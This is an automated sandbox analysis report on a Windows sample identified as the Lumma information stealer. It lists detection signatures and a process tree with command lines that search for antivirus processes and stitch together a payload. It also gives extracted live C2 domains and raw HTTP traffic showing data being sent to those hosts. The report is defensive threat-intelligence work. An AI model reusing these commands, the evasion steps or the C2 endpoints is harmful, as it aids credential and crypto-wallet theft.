Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
es5qBEFupj.exe

Overview

General Information

Sample name:es5qBEFupj.exe
renamed because original name is a hash value
Original sample name:25c8f6ada1179e3fcf486844e5c1ed24.exe
Analysis ID:1581590
MD5:25c8f6ada1179e3fcf486844e5c1ed24
SHA1:286fa29c9a674651b445e465309c21c99e2d5b95
SHA256:8077581cfece59ca6d8e06d5bedde9664014531a091d3c15732aeae4679dd40e
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Leaks process information
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • es5qBEFupj.exe (PID: 5600 cmdline: "C:\Users\user\Desktop\es5qBEFupj.exe" MD5: 25C8F6ADA1179E3FCF486844E5C1ED24)
    • PasoCattle.exe (PID: 2012 cmdline: "C:\Users\user\AppData\Local\Temp\PasoCattle.exe" MD5: A3E9A86D6EDE94C3C71D1F7EEA537766)
      • cmd.exe (PID: 7284 cmdline: "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7560 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 7568 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • tasklist.exe (PID: 7640 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
        • findstr.exe (PID: 7648 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 7712 cmdline: cmd /c md 768400 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • extrac32.exe (PID: 7728 cmdline: extrac32 /Y /E Reflect MD5: 9472AAB6390E4F1431BAA912FCFF9707)
        • findstr.exe (PID: 7748 cmdline: findstr /V "cocks" Articles MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • cmd.exe (PID: 7764 cmdline: cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • Climb.com (PID: 7780 cmdline: Climb.com V MD5: 62D09F076E6E0240548C2F837536A46A)
        • choice.exe (PID: 7800 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
    • Set-up.exe (PID: 7224 cmdline: "C:\Users\user\AppData\Local\Temp\Set-up.exe" MD5: 2A99036C44C996CEDEB2042D389FE23C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["hummskitnj.buzz", "screwamusresz.buzz", "rebuildeso.buzz", "inherineau.buzz", "spuriotis.click", "prisonyfork.buzz", "scentniej.buzz", "cashfuzysao.buzz", "appliacnesot.buzz"], "Build id": "5FwhVM--lll"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000015.00000002.2508538313.0000000001081000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000015.00000002.2508841125.0000000001158000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000015.00000003.2332004575.0000000001155000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: Climb.com PID: 7780JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
              Process Memory Space: Climb.com PID: 7780JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 3 entries
                SourceRuleDescriptionAuthorStrings
                0.2.es5qBEFupj.exe.340000.0.unpackMALWARE_Win_DLInjector04Detects downloader / injectorditekSHen
                • 0x78d71d:$s1: Runner
                • 0x78d882:$s3: RunOnStartup
                • 0x78d731:$a1: Antis
                • 0x78d75e:$a2: antiVM
                • 0x78d765:$a3: antiSandbox
                • 0x78d771:$a4: antiDebug
                • 0x78d77b:$a5: antiEmulator
                • 0x78d788:$a6: enablePersistence
                • 0x78d79a:$a7: enableFakeError
                • 0x78d8ab:$a8: DetectVirtualMachine
                • 0x78d8d0:$a9: DetectSandboxie
                • 0x78d8fb:$a10: DetectDebugger
                • 0x78d90a:$a11: CheckEmulator

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7284, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7648, ProcessName: findstr.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:34:53.034167+010020283713Unknown Traffic192.168.2.749754172.67.128.184443TCP
                2024-12-28T09:34:55.202333+010020283713Unknown Traffic192.168.2.749760172.67.128.184443TCP
                2024-12-28T09:34:57.558546+010020283713Unknown Traffic192.168.2.749766172.67.128.184443TCP
                2024-12-28T09:34:59.828548+010020283713Unknown Traffic192.168.2.749772172.67.128.184443TCP
                2024-12-28T09:35:02.092410+010020283713Unknown Traffic192.168.2.749778172.67.128.184443TCP
                2024-12-28T09:35:04.435142+010020283713Unknown Traffic192.168.2.749784172.67.128.184443TCP
                2024-12-28T09:35:06.931421+010020283713Unknown Traffic192.168.2.749790172.67.128.184443TCP
                2024-12-28T09:35:10.480730+010020283713Unknown Traffic192.168.2.749801172.67.128.184443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:34:53.947129+010020546531A Network Trojan was detected192.168.2.749754172.67.128.184443TCP
                2024-12-28T09:34:55.974849+010020546531A Network Trojan was detected192.168.2.749760172.67.128.184443TCP
                2024-12-28T09:35:11.270675+010020546531A Network Trojan was detected192.168.2.749801172.67.128.184443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:34:53.947129+010020498361A Network Trojan was detected192.168.2.749754172.67.128.184443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:34:55.974849+010020498121A Network Trojan was detected192.168.2.749760172.67.128.184443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-28T09:35:05.322094+010020480941Malware Command and Control Activity Detected192.168.2.749784172.67.128.184443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: es5qBEFupj.exeAvira: detected
                Source: http://home.fortth14ht.top/nTrmoVgOaovBJpKSuLkP173521000335a1Avira URL Cloud: Label: malware
                Source: 00000015.00000003.1525157135.0000000001109000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["hummskitnj.buzz", "screwamusresz.buzz", "rebuildeso.buzz", "inherineau.buzz", "spuriotis.click", "prisonyfork.buzz", "scentniej.buzz", "cashfuzysao.buzz", "appliacnesot.buzz"], "Build id": "5FwhVM--lll"}
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeReversingLabs: Detection: 69%
                Source: es5qBEFupj.exeVirustotal: Detection: 33%Perma Link
                Source: es5qBEFupj.exeReversingLabs: Detection: 39%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                Source: es5qBEFupj.exeJoe Sandbox ML: detected
                Source: 00000015.00000003.1525157135.0000000001109000.00000004.00000020.00020000.00000000.sdmpString decryptor: hummskitnj.buzz
                Source: 00000015.00000003.1525157135.0000000001109000.00000004.00000020.00020000.00000000.sdmpString decryptor: cashfuzysao.buzz
                Source: 00000015.00000003.1525157135.0000000001109000.00000004.00000020.00020000.00000000.sdmpString decryptor: appliacnesot.buzz
                Source: 00000015.00000003.1525157135.0000000001109000.00000004.00000020.00020000.00000000.sdmpString decryptor: screwamusresz.buzz
                Source: 00000015.00000003.1525157135.0000000001109000.00000004.00000020.00020000.00000000.sdmpString decryptor: inherineau.buzz
                Source: 00000015.00000003.1525157135.0000000001109000.00000004.00000020.00020000.00000000.sdmpString decryptor: scentniej.buzz
                Source: 00000015.00000003.1525157135.0000000001109000.00000004.00000020.00020000.00000000.sdmpString decryptor: rebuildeso.buzz
                Source: 00000015.00000003.1525157135.0000000001109000.00000004.00000020.00020000.00000000.sdmpString decryptor: prisonyfork.buzz
                Source: 00000015.00000003.1525157135.0000000001109000.00000004.00000020.00020000.00000000.sdmpString decryptor: spuriotis.click
                Source: 00000015.00000003.1525157135.0000000001109000.00000004.00000020.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000015.00000003.1525157135.0000000001109000.00000004.00000020.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000015.00000003.1525157135.0000000001109000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000015.00000003.1525157135.0000000001109000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000015.00000003.1525157135.0000000001109000.00000004.00000020.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000015.00000003.1525157135.0000000001109000.00000004.00000020.00020000.00000000.sdmpString decryptor: 5FwhVM--lll
                Source: es5qBEFupj.exe, 00000000.00000002.1335270783.00000000073F4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_c12715e3-1
                Source: es5qBEFupj.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.7:49754 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.7:49760 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.7:49766 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.7:49772 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.7:49778 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.7:49784 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.7:49790 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.128.184:443 -> 192.168.2.7:49801 version: TLS 1.2
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 7_2_00406301 FindFirstFileW,FindClose,7_2_00406301
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 7_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_0011DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,21_2_0011DC54
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_0012A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,21_2_0012A087
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_0012A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,21_2_0012A1E2
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_0011E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,21_2_0011E472
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_0012A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,21_2_0012A570
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000EC622 FindFirstFileExW,21_2_000EC622
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_001266DC FindFirstFileW,FindNextFileW,FindClose,21_2_001266DC
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_00127333 FindFirstFileW,FindClose,21_2_00127333
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_001273D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,21_2_001273D4
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_0011D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,21_2_0011D921
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\768400Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\768400\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Jump to behavior

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49784 -> 172.67.128.184:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.7:49760 -> 172.67.128.184:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49760 -> 172.67.128.184:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49754 -> 172.67.128.184:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49754 -> 172.67.128.184:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49801 -> 172.67.128.184:443
                Source: Malware configuration extractorURLs: hummskitnj.buzz
                Source: Malware configuration extractorURLs: screwamusresz.buzz
                Source: Malware configuration extractorURLs: rebuildeso.buzz
                Source: Malware configuration extractorURLs: inherineau.buzz
                Source: Malware configuration extractorURLs: spuriotis.click
                Source: Malware configuration extractorURLs: prisonyfork.buzz
                Source: Malware configuration extractorURLs: scentniej.buzz
                Source: Malware configuration extractorURLs: cashfuzysao.buzz
                Source: Malware configuration extractorURLs: appliacnesot.buzz
                Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
                Source: global trafficHTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: */*Content-Type: application/jsonContent-Length: 444328Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 39 38 32 31 37 36 35 32 39 31 34 30 37 35 36 36 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 30 34 20 7d 2c
                Source: global trafficHTTP traffic detected: GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1Host: home.fortth14ht.topAccept: */*
                Source: global trafficHTTP traffic detected: POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1Host: home.fortth14ht.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
                Source: Joe Sandbox ViewIP Address: 34.226.108.155 34.226.108.155
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49754 -> 172.67.128.184:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49760 -> 172.67.128.184:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49766 -> 172.67.128.184:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49772 -> 172.67.128.184:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49778 -> 172.67.128.184:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49784 -> 172.67.128.184:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49790 -> 172.67.128.184:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.7:49801 -> 172.67.128.184:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: spuriotis.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 45Host: spuriotis.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PUFJDD4WX8DV89CDT6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12842Host: spuriotis.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=F4ETTRT10471MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15044Host: spuriotis.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=G7DEZVA16LULIC39DTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20399Host: spuriotis.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=X9PI53GFX9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1177Host: spuriotis.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=EH2DXUTULUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 552292Host: spuriotis.click
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: spuriotis.click
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
